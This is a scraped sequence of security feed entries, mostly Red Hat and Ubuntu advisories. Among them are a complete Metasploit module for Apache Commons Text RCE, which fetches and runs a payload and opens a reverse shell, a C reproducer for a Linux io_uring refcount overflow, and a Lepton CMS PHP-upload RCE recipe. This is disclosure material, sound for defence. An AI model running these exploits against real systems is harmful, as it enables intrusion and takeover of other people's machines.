Red Hat Security Advisory 2024-0193-03 - An update is now available for Red Hat OpenShift Container Platform 4.13.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0193.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: OpenShift Container Platform 4.13.29 bug fix and security update  
Advisory ID:        RHSA-2024:0193-03  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0193  
Issue date:         2024-01-20  
Revision:           03  
CVE Names:          CVE-2021-20329  
====================================================================

Summary: 

An update is now available for Red Hat OpenShift Container Platform 4.13.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container Platform 4.13.29. See the following advisory for the RPM packages for this release:

https://access.redhat.com/errata/RHSA-2024:0195

Space precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.13/release_notes/ocp-4-13-release-notes.html

Security Fix(es):

* golang: net/http, x/net/http2: rapid stream resets can cause excessive work (CVE-2023-44487) (CVE-2023-39325)

* mongo-go-driver: specific cstrings input may not be properly validated (CVE-2021-20329)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://docs.openshift.com/container-platform/4.13/release_notes/ocp-4-13-release-notes.html

CVEs:

CVE-2021-20329

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=1971033  
https://bugzilla.redhat.com/show_bug.cgi?id=2243296  
https://issues.redhat.com/browse/OCPBUGS-19658  
https://issues.redhat.com/browse/OCPBUGS-23483  
https://issues.redhat.com/browse/OCPBUGS-25988

Red Hat Security Advisory 2024-0193-03

This Metasploit module exploit takes advantage of the StringSubstitutor interpolator class, which is included in the Commons Text library. A default interpolator allows for string lookups that can lead to remote code execution. This is due to a logic flaw that makes the script, dns and url lookup keys interpolated by default, as opposed to what it should be, according to the documentation of the StringLookupFactory class. Those keys allow an attacker to execute arbitrary code via lookups primarily using the script key. In order to exploit the vulnerabilities, the following requirements must be met: Run a version of Apache Commons Text from version 1.5 to 1.9, use the StringSubstitutor interpolator, and the target should run JDK versions prior to 15.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  include Msf::Exploit::Remote::Java::HTTP::ClassLoader  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Apache Commons Text RCE',        'Description' => %q{          This exploit takes advantage of the StringSubstitutor interpolator class,          which is included in the Commons Text library. A default interpolator          allows for string lookups that can lead to Remote Code Execution. This          is due to a logic flaw that makes the “script”, “dns” and “url” lookup          keys interpolated by default, as opposed to what it should be, according          to the documentation of the StringLookupFactory class. Those keys allow          an attacker to execute arbitrary code via lookups primarily using the          "script" key.          In order to exploit the vulnerabilities, the following requirements must          be met:          Run a version of Apache Commons Text from version 1.5 to 1.9          Use the StringSubstitutor interpolator          Target should run JDK < 15        },        'License' => MSF_LICENSE,        'Author' => [          'Alvaro Muñoz', # Original research          'Karthik UJ', # PoC          'Gaurav Jain', # Metasploit module        ],        'References' => [          ['CVE', '2022-42889'],          ['URL', 'https://sysdig.com/blog/cve-2022-42889-text4shell/'],          ['URL', 'https://github.com/karthikuj/cve-2022-42889-text4shell-docker']        ],        'Platform' => ['win', 'linux', 'unix', 'java'],        'Targets' => [          [            'Java (in-memory)',            {              'Type' => :java,              'Platform' => 'java',              'Arch' => ARCH_JAVA,              'DefaultOptions' => { 'Payload' => 'java/meterpreter/reverse_tcp' }            },          ],          [            'Windows EXE Dropper',            {              'Platform' => 'win',              'Arch' => [ARCH_X86, ARCH_X64],              'Type' => :windows_dropper,              'DefaultOptions' => { 'Payload' => 'windows/x64/meterpreter/reverse_tcp' }            }          ],          [            'Windows Command',            {              'Platform' => 'win',              'Arch' => ARCH_CMD,              'Type' => :windows_cmd,              'DefaultOptions' => { 'Payload' => 'cmd/windows/powershell/meterpreter/reverse_tcp' }            }          ],          [            'Unix Command',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => { 'Payload' => 'cmd/unix/reverse_jjs' }            }          ],          [            'Linux Dropper',            {              'Platform' => 'linux',              'Arch' => [ARCH_X86, ARCH_X64],              'Type' => :linux_dropper,              'DefaultOptions' => { 'Payload' => 'linux/x86/meterpreter/reverse_tcp' }            }          ]        ],        'Privileged' => false,        'DisclosureDate' => '2022-10-13',        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]        }      )    )    register_options([      OptString.new('TARGETURI', [ true, 'The target URI', '/']),      OptString.new('PARAM', [ true, 'The vulnerable parameter']),      OptEnum.new('METHOD', [ true, 'The HTTP method to use', 'GET', ['GET', 'POST']])    ])  end  def check    vprint_status("Checking if #{peer} can be exploited.")    res = send_exp    return CheckCode::Unknown('No response received from target.') unless res    # blind command injection using sleep command    sleep_time = rand(4..8)    vprint_status("Performing command injection test issuing a sleep command of #{sleep_time} seconds.")    _res, elapsed_time = Rex::Stopwatch.elapsed_time do      send_exp("java.lang.Thread.sleep(#{sleep_time * 1000})")    end    vprint_status("Elapsed time: #{elapsed_time.round(2)} seconds.")    return CheckCode::Safe('Command injection test failed.') unless elapsed_time >= sleep_time    CheckCode::Vulnerable('Successfully tested command injection.')  end  def exploit    case target['Type']    when :java      # Start the HTTP server to serve the payload      start_service      # Trigger a loadClass request via java.net.URLClassLoader      trigger_urlclassloader      # Handle the payload      handler    when :windows_cmd, :unix_cmd      execute_command(payload.encoded)    when :windows_dropper, :linux_dropper      execute_cmdstager    end  end  def trigger_urlclassloader    url = get_uri    vars = Rex::RandomIdentifier::Generator.new    exp = "var #{vars[:str_arr]} = Java.type('java.lang.String[]');"    exp << "var #{vars[:obj]} = new java.net.URLClassLoader([new java.net.URL(new java.lang.String(java.util.Base64.getDecoder().decode('#{Rex::Text.encode_base64(url)}')))]).loadClass('metasploit.Payload');"    exp << "#{vars[:obj]}.getMethod('main', java.lang.Class.forName('[Ljava.lang.String;')).invoke(null, [new #{vars[:str_arr]}(1)]);"    res = send_exp(exp)    fail_with(Failure::Unreachable, 'No response received from the target') unless res    fail_with(Failure::Unknown, 'An unknown error occurred') unless res.code == 200  end  def execute_command(cmd, _opts = {})    vars = Rex::RandomIdentifier::Generator.new    exp = "var #{vars[:arr]} = [#{win_target? ? '"cmd.exe", "/c"' : '"/bin/sh", "-c"'}, new java.lang.String(java.util.Base64.getDecoder().decode(\"#{Rex::Text.encode_base64(cmd)}\"))];"    exp << "java.lang.Runtime.getRuntime().exec(#{vars[:arr]});"    res = send_exp(exp)    fail_with(Failure::Unreachable, 'No response received from the target') unless res    fail_with(Failure::Unknown, 'An unknown error occurred') unless res.code == 200  end  def send_exp(exp = '')    vars = datastore['METHOD'] == 'GET' ? 'vars_get' : 'vars_post'    send_request_cgi(      'method' => datastore['METHOD'],      'uri' => normalize_uri(target_uri.path),      vars => {        datastore['PARAM'] => "${script:javascript:#{exp}}"      }    )  end  def win_target?    target['Platform'] == 'win'  end  def on_request_uri(cli, request)    case target['Type']    when :java      # Call method to handle java payload staging      super(cli, request)    else      # Handle win/unix cmd staging      client = cli.peerhost      print_status("Client #{client} requested #{request.uri}")      print_status("Sending payload to #{client}")      send_response(cli, exe)    end  endend

Apache Commons Text 1.9 Remote Code Execution

Linux versions 5.6 and above appear to suffer from a cred refcount overflow when handling approximately 39 gigabytes of memory usage via io_uring.

    Linux >=5.6: cred refcount overflow at ~39 GiB memory usage via io_uring(see also my related prior bug reports about overflowing refcounts with lotsof RAM usage:https://crbug.com/project-zero/809: BPF program refcount, with ~32GiB RAMhttps://crbug.com/project-zero/1752: page->refcount via FUSE with ~140GiB RAM)Since commit 071698e13ac6 (\"io_uring: allow registering credentials\"), landedin 5.6, it has been possible to grab references to `struct cred` veryefficiently - by repeatedly calling the syscall`io_uring_register(fd, IORING_REGISTER_PERSONALITY, NULL, 0)`, it is possibleto register up to 0xffff refcounted pointers to `struct cred` in an xarray(or in older kernel versions, in an IDR). These pointers can all be pointingto the same `struct cred`.By using a bunch of io_uring instances, that makes it possible to create alot of refcounted references to `struct cred` at a very efficient and lowamortized memory cost of less than 10 bytes per reference.`struct cred` is refcounted using the member `atomic_t usage`, which is aplain signed 32-bit atomic counter with no overflow checking.I believe there is some history here where Elena Reshetova and Kees Cook havebeen trying to turn it into a `refcount_t`, which would also fix this kind ofissue by marking the refcount as \"saturated\" when it reaches 2^31 and thennever freeing the object. Most recently there was this thread, where Keestried to get that change in; there was some discussion, but I don't thinkanything has landed so far:<https://lore.kernel.org/all/20230818041740.gonna.513-kees@kernel.org/>So by using ~39 GiB of physical memory, it is possible to store 2^32references to `struct cred` and overflow the reference counter. That's notexactly a small amount of RAM, but I guess a lot of servers probably have thatmuch RAM? At least cloud providers like AWS sell machines with much more RAMthan that.I am including as recipients both akpm (who is the maintainer forkernel/cred.c and was involved in the linked discussion) and the io_uringmaintainers (though io_uring, in my opinion, isn't really where the core issuehere lies, but it happened to make it possible to hit this overflow using afairly small amount of physical memory).Reproducer (compile with -pthread; requires ~39GiB of physical RAM, I tested itin a VM so that the host machine could swap a bit):============#define _GNU_SOURCE#include <pthread.h>#include <unistd.h>#include <err.h>#include <fcntl.h>#include <string.h>#include <stdio.h>#include <stdlib.h>#include <ctype.h>#include <signal.h>#include <sys/syscall.h>#include <sys/wait.h>#include <sys/prctl.h>#include <sys/mman.h>#include <sys/resource.h>#include <sys/eventfd.h>#include <linux/io_uring.h>#define SYSCHK(x) ({          \\  typeof(x) __res = (x);      \\  if (__res == (typeof(x))-1) \\    err(1, \"SYSCHK(\" #x \")\"); \\  __res;                      \\})// power of 2#define PARALLELISM 4static int efd;static void *thread_fn(void *dummy) {  for (long refcount = 0; refcount < (1UL<<32)/PARALLELISM;) {    struct io_uring_params params = {      .flags = IORING_SETUP_NO_SQARRAY    };    int uring_fd = SYSCHK(syscall(__NR_io_uring_setup, /*entries=*/40, &params));    printf(\"uring_fd = 0x%x\\", (unsigned int)uring_fd);    for (int i=0; i<0xffff; i++, refcount++)      SYSCHK(syscall(__NR_io_uring_register, uring_fd, IORING_REGISTER_PERSONALITY, NULL, 0));  }  printf(\"one thread ready\\");  eventfd_write(efd, 1);  while (1) pause();}int main(void) {  setbuf(stdout, NULL);  sync();  struct rlimit rlim;  SYSCHK(getrlimit(RLIMIT_NOFILE, &rlim));  if (rlim.rlim_max < 65550)    printf(\"WARNING: RLIMIT_NOFILE maximum is probably too low\\");  rlim.rlim_cur = rlim.rlim_max;  SYSCHK(setrlimit(RLIMIT_NOFILE, &rlim));  efd = SYSCHK(eventfd(0, 0));  pthread_t threads[PARALLELISM];  for (int i = 0; i < PARALLELISM; i++) {    if (pthread_create(threads+i, NULL, thread_fn, NULL))      errx(1, \"pthread_create\");  }  for (int i=0; i<4;) {    eventfd_t val;    SYSCHK(eventfd_read(efd, &val));    i += val;  }  printf(\"refs should have wrapped. press ctrl+c for uaf on cleanup.\\");  while (1)    pause();}============The reproducer takes a while to run; when it's done and the cred refcount hasbeen wrapped, you can press ctrl+c to make the process exit, which willrepeatedly decrement the cred refcount until the cred refcount reaches zero(when there are actually 2^32 references remaining).At that point, it'll hit the `BUG_ON(cred == current->cred)` check in`__put_cred()`, since the reproducer doesn't go out of its way to avoid thischeck:============kernel BUG at kernel/cred.c:150!invalid opcode: 0000 [#1] PREEMPT SMPCPU: 2 PID: 580 Comm: uring-credref Not tainted 6.7.0-rc3 #362Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/01/2014RIP: 0010:__put_cred+0x55/0x60Code: 87 a0 00 00 00 85 c0 74 0c 48 81 c7 a0 00 00 00 e9 b0 fe ff ff 48 81 c7 a0 00 00 00 48 c7 c6 40 39 0d b0 e9 9d 53 07 00 0f 0b <0f> 0b 0f 0b 0f 1f 80 00 00 00 00 90 90 90 90 90 90 90 90 90 90 90RSP: 0018:ffffb2e382b5bcf0 EFLAGS: 00010246RAX: ffff8c4e21c6c080 RBX: ffff8c52fce02000 RCX: ffffb2e382b5bc94RDX: 0000000000000001 RSI: ffff8c52fce025c0 RDI: ffff8c4e1f2c2480RBP: ffff8c52fce025a8 R08: ffffb2e382b5bc98 R09: 0000000000000007R10: 0000000000000001 R11: 0000000000000001 R12: ffff8c52fce02040R13: ffff8c4e072fc520 R14: ffff8c576139c9c0 R15: ffff8c4e21c6c938FS:  0000000000000000(0000) GS:ffff8c598dd00000(0000) knlGS:0000000000000000CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033CR2: 000055a8bdfd1d70 CR3: 0000000411e47001 CR4: 0000000000770ef0PKRU: 55555554Call Trace: <TASK> [...] io_ring_ctx_wait_and_kill+0xa8/0x180 io_uring_release+0x20/0x30 __fput+0x92/0x2c0 task_work_run+0x5a/0x90 do_exit+0x36c/0xbc0 do_group_exit+0x37/0xa0 get_signal+0xbcf/0xbd0 arch_do_signal_or_restart+0x3e/0x270 exit_to_user_mode_prepare+0xba/0x110 syscall_exit_to_user_mode+0x21/0x50 do_syscall_64+0x52/0xf0 entry_SYSCALL_64_after_hwframe+0x6e/0x76RIP: 0033:0x7ff41d547d92Code: Unable to access opcode bytes at 0x7ff41d547d68.RSP: 002b:00007ff41d370e30 EFLAGS: 00000293 ORIG_RAX: 0000000000000022RAX: fffffffffffffdfe RBX: 000000004000bfff RCX: 00007ff41d547d92RDX: 0000000000000008 RSI: 00007ff41d370e38 RDI: 0000000000000000RBP: 000000000000ffc1 R08: 0000000000000000 R09: 0000008000000040R10: 0000000000000000 R11: 0000000000000293 R12: 000000004000bfffR13: 00007ff41d370e50 R14: 00007ff41d370e50 R15: 0000000000000000 </TASK>Modules linked in:---[ end trace 0000000000000000 ]---RIP: 0010:__put_cred+0x55/0x60Code: 87 a0 00 00 00 85 c0 74 0c 48 81 c7 a0 00 00 00 e9 b0 fe ff ff 48 81 c7 a0 00 00 00 48 c7 c6 40 39 0d b0 e9 9d 53 07 00 0f 0b <0f> 0b 0f 0b 0f 1f 80 00 00 00 00 90 90 90 90 90 90 90 90 90 90 90RSP: 0018:ffffb2e382b5bcf0 EFLAGS: 00010246RAX: ffff8c4e21c6c080 RBX: ffff8c52fce02000 RCX: ffffb2e382b5bc94RDX: 0000000000000001 RSI: ffff8c52fce025c0 RDI: ffff8c4e1f2c2480RBP: ffff8c52fce025a8 R08: ffffb2e382b5bc98 R09: 0000000000000007R10: 0000000000000001 R11: 0000000000000001 R12: ffff8c52fce02040R13: ffff8c4e072fc520 R14: ffff8c576139c9c0 R15: ffff8c4e21c6c938FS:  0000000000000000(0000) GS:ffff8c598dd00000(0000) knlGS:0000000000000000CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033CR2: 000055a8bdfd1d70 CR3: 0000000411e47001 CR4: 0000000000770ef0PKRU: 55555554Fixing recursive fault but reboot is needed!============A use-after-free of `struct cred` should be exploitable; one method would beto try to get the freed object allocated again as the `struct cred` of aroot-privileged process, another method would be to try to reallocate theobject with a buffer containing attacker-controlled data somehow (and thenfake a full capability set in init_user_ns with UIDs set to zero).While one tempting easy fix here would be to close off avenues for gettinglots of references with little RAM (like somehow making io_uring reuse IDswith a local usage counter when userspace tries to insert the same`struct cred` into the xarray multiple times), I think that this example showshow fragile that method is. It requires knowing about all the variousreference paths that can hold references to `struct cred`, and what kinds ofmultipliers or global limits apply at every point in this reference graph.I think the kernel should be using some flavor of saturating refcounts as thedefault choice, at least on machines that have enough RAM to store 2^32pointers.If there are specific cases where the overhead is undesirable, I think weshould only omit such a check if we can document exactly how many referencescan exist at most, with enough warning comments scattered around to ensurethat the assumptions can't accidentally be broken inadvertently later on.(Or the kernel could limit SLUB to a maximum of 32 GiB of memory except forspecially marked slabs that store objects guaranteed to not hold multiplereferences to the same object, but I think people would probably hate thatidea.)(But note that refcount hardening also has value for protecting against bugswhere some repeatedly executed codepath forgets to decrement the refcount,letting it drift up until it wraps around; and that kind of bug is alsoexploitable without using ginormous amounts of RAM.)This bug is subject to a 90-day disclosure deadline. If a fix for thisissue is made available to users before the end of the 90-day deadline,this bug report will become public 30 days after the fix was madeavailable. Otherwise, this bug report will become public at the deadline.The scheduled deadline is 2024-02-26.Found by: jannh@google.com

Linux 5.6 io_uring Cred Refcount Overflow

Ubuntu Security Notice 6589-1 - Fabian Baeumer, Marcus Brinkmann and Joerg Schwenk discovered that the SSH protocol used in FileZilla is prone to a prefix truncation attack, known as the "Terrapin attack". A remote attacker could use this issue to downgrade or disable some security features and obtain sensitive information.

==========================================================================  
Ubuntu Security Notice USN-6589-1  
January 18, 2024

filezilla vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

FileZilla could be made to expose sensitive information over the  
network.

Software Description:  
- filezilla: Full-featured graphical FTP/FTPS/SFTP client

Details:

Fabian Baeumer, Marcus Brinkmann and Joerg Schwenk discovered that the SSH  
protocol used in FileZilla is prone to a prefix truncation attack, known as  
the "Terrapin attack". A remote attacker could use this issue to downgrade or  
disable some security features and obtain sensitive information.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.10:  
  filezilla                       3.65.0-3ubuntu0.1  
  filezilla-common                3.65.0-3ubuntu0.1

Ubuntu 22.04 LTS:  
  filezilla                       3.58.0-1ubuntu0.1  
  filezilla-common                3.58.0-1ubuntu0.1

Ubuntu 20.04 LTS:  
  filezilla                       3.46.3-1ubuntu0.1  
  filezilla-common                3.46.3-1ubuntu0.1

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6589-1  
  CVE-2023-48795

Package Information:  
  https://launchpad.net/ubuntu/+source/filezilla/3.65.0-3ubuntu0.1  
  https://launchpad.net/ubuntu/+source/filezilla/3.58.0-1ubuntu0.1  
  https://launchpad.net/ubuntu/+source/filezilla/3.46.3-1ubuntu0.1

Ubuntu Security Notice USN-6589-1

Lepton CMS version 7.0.0 suffers from a remote code execution vulnerability.

    ## Exploit Title: LeptonCMS Version : 7.0.0  Remote Code Execution### Date: 2024-1-19### Exploit Author: tmrswrr### Category: Webapps### Vendor Homepage: https://www.lepton-cms.com/### Version : 7.0.0### Tested on: https://www.softaculous.com/apps/cms/LEPTON1 ) Login with admin cred   >  https://127.0.0.1/LEPTON/backend/login/index.php2 ) Go to Languages place   > https://127.0.0.1/LEPTON/backend/languages/index.php3 ) Upload upgrade.php file in languages place > <?php echo system('id'); ?>4 ) After click install you will be see result### Result :  uid=1000(lepton) gid=1000(lepton) groups=1000(lepton) uid=1000(lepton) gid=1000(lepton) groups=1000(lepton)

Lepton CMS 7.0.0 Remote Code Execution

Red Hat Security Advisory 2024-0304-03 - Updated images are now available for Red Hat Advanced Cluster Security 3.74. The updated images includes bug and security fixes.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0304.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: RHACS 3.74 enhancement and security update  
Advisory ID:        RHSA-2024:0304-03  
Product:            Red Hat Advanced Cluster Security for Kubernetes  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0304  
Issue date:         2024-01-19  
Revision:           03  
CVE Names:          CVE-2023-5868  
====================================================================

Summary: 

Updated images are now available for Red Hat Advanced Cluster Security 3.74. The updated images includes bug and security fixes.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

This release of RHACS 3.74.8 provides the following changes:

* The HTTP/2 functionality in the RHACS Operator webhook has been disabled  
to mitigate CVE-2023-44487.  
* Fixed postgresql vulnerabilities in multiple images.

Solution:

CVEs:

CVE-2023-5868

References:

https://docs.openshift.com/acs/3.74/release_notes/374-release-notes.html  
https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2228111  
https://bugzilla.redhat.com/show_bug.cgi?id=2247168  
https://bugzilla.redhat.com/show_bug.cgi?id=2247169  
https://bugzilla.redhat.com/show_bug.cgi?id=2247170  
https://issues.redhat.com/browse/ROX-20391  
https://issues.redhat.com/browse/ROX-20542  
https://issues.redhat.com/browse/ROX-21190  
https://issues.redhat.com/browse/ROX-21784  
https://issues.redhat.com/browse/ROX-21785  
https://issues.redhat.com/browse/ROX-21786  
https://issues.redhat.com/browse/ROX-21787

Red Hat Security Advisory 2024-0304-03

Red Hat Security Advisory 2024-0300-03 - An update for python-urllib3 is now available for Red Hat Enterprise Linux 8.6 Extended Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0300.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: python-urllib3 security updateAdvisory ID:        RHSA-2024:0300-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0300Issue date:         2024-01-18Revision:           03CVE Names:          CVE-2023-43804====================================================================Summary: An update for python-urllib3 is now available for Red Hat Enterprise Linux 8.6 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The python-urllib3 package provides the Python HTTP module with connection pooling and file POST abilities.Security Fix(es):* python-urllib3: Cookie request header isn't stripped during cross-origin redirects (CVE-2023-43804)* urllib3: Request body not stripped after redirect from 303 status changes request method to GET (CVE-2023-45803)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-43804References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2242493https://bugzilla.redhat.com/show_bug.cgi?id=2246840

Red Hat Security Advisory 2024-0300-03

Red Hat Security Advisory 2024-0299-03 - An update for python-requests is now available for Red Hat Enterprise Linux 8.6 Extended Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0299.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: python-requests security updateAdvisory ID:        RHSA-2024:0299-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0299Issue date:         2024-01-18Revision:           03CVE Names:          CVE-2023-32681====================================================================Summary: An update for python-requests is now available for Red Hat Enterprise Linux 8.6 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The python-requests package contains a library designed to make HTTP requests easy for developers.Security Fix(es):* python-requests: Unintended leak of Proxy-Authorization header (CVE-2023-32681)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-32681References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2209469

Red Hat Security Advisory 2024-0299-03

Red Hat Security Advisory 2024-0298-03 - Red Hat Advanced Cluster Management for Kubernetes 2.9.2 General Availability release images, which provide security updates and fix bugs. Issues addressed include denial of service and traversal vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0298.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Critical: Red Hat Advanced Cluster Management 2.9.2 security and bug fix container updates  
Advisory ID:        RHSA-2024:0298-03  
Product:            Red Hat ACM  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0298  
Issue date:         2024-01-18  
Revision:           03  
CVE Names:          CVE-2023-49568  
====================================================================

Summary: 

Red Hat Advanced Cluster Management for Kubernetes 2.9.2 General  
Availability release images, which provide security updates and fix bugs.

Red Hat Product Security has rated this update as having a security impact  
of Critical. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE links in the References section.

Description:

Red Hat Advanced Cluster Management for Kubernetes 2.9.2 images

Red Hat Advanced Cluster Management for Kubernetes provides the  
capabilities to address common challenges that administrators and site  
reliability engineers face as they work across a range of public and  
private cloud environments. Clusters and applications are all visible and  
managed from a single console—with security policy built in.

Jira issues addressed:

ACM-8456: 'Search' feature on logs page is not working  
ACM-8857: credentials restore file is executed after resources restore  
ACM-8966: oc get policy still returns NonCompliant 10 minutes after deleting the certificate and secret  
ACM-9094: Configuration Policy controller unexpectedly gets taken out of uninstall mode

Security fix(es):  
CVE-2023-49568 go-git: Maliciously crafted Git server replies can cause DoS on go-git clients  
CVE-2023-49569 go-git: Maliciously crafted Git server replies can lead to path traversal and RCE on go-git clients

Solution:

https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.9/html-single/install/index#installing

CVEs:

CVE-2023-49568

References:

https://access.redhat.com/security/updates/classification/#critical  
https://bugzilla.redhat.com/show_bug.cgi?id=2258143  
https://bugzilla.redhat.com/show_bug.cgi?id=2258165  
https://issues.redhat.com/browse/ACM-8456  
https://issues.redhat.com/browse/ACM-8857  
https://issues.redhat.com/browse/ACM-8966  
https://issues.redhat.com/browse/ACM-9094

Red Hat Security Advisory 2024-0298-03

Red Hat Security Advisory 2024-0266-03 - An update for java-11-openjdk is now available for Red Hat Enterprise Linux 8, Red Hat Enterprise Linux 8.8 Extended Update Support, Red Hat Enterprise Linux 9, and Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include code execution and out of bounds access vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0266.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: java-11-openjdk security update  
Advisory ID:        RHSA-2024:0266-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0266  
Issue date:         2024-01-18  
Revision:           03  
CVE Names:          CVE-2024-20918  
====================================================================

Summary: 

An update for java-11-openjdk is now available for Red Hat Enterprise Linux 8, Red Hat Enterprise Linux 8.8 Extended Update Support, Red Hat Enterprise Linux 9, and Red Hat Enterprise Linux 9.2 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The java-11-openjdk packages provide the OpenJDK 11 Java Runtime Environment and the OpenJDK 11 Java Software Development Kit.

Security Fix(es):

* OpenJDK: array out-of-bounds access due to missing range check in C1 compiler (8314468) (CVE-2024-20918)

* OpenJDK: RSA padding issue and timing side-channel attack against TLS (8317547) (CVE-2024-20952)

* OpenJDK: JVM class file verifier flaw allows unverified bytecode execution (8314295) (CVE-2024-20919)

* OpenJDK: range check loop optimization issue (8314307) (CVE-2024-20921)

* OpenJDK: arbitrary Java code execution in Nashorn (8314284) (CVE-2024-20926)

* OpenJDK: logging of digital signature private keys (8316976) (CVE-2024-20945)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-20918

References:

https://access.redhat.com/security/updates/classification/#important  
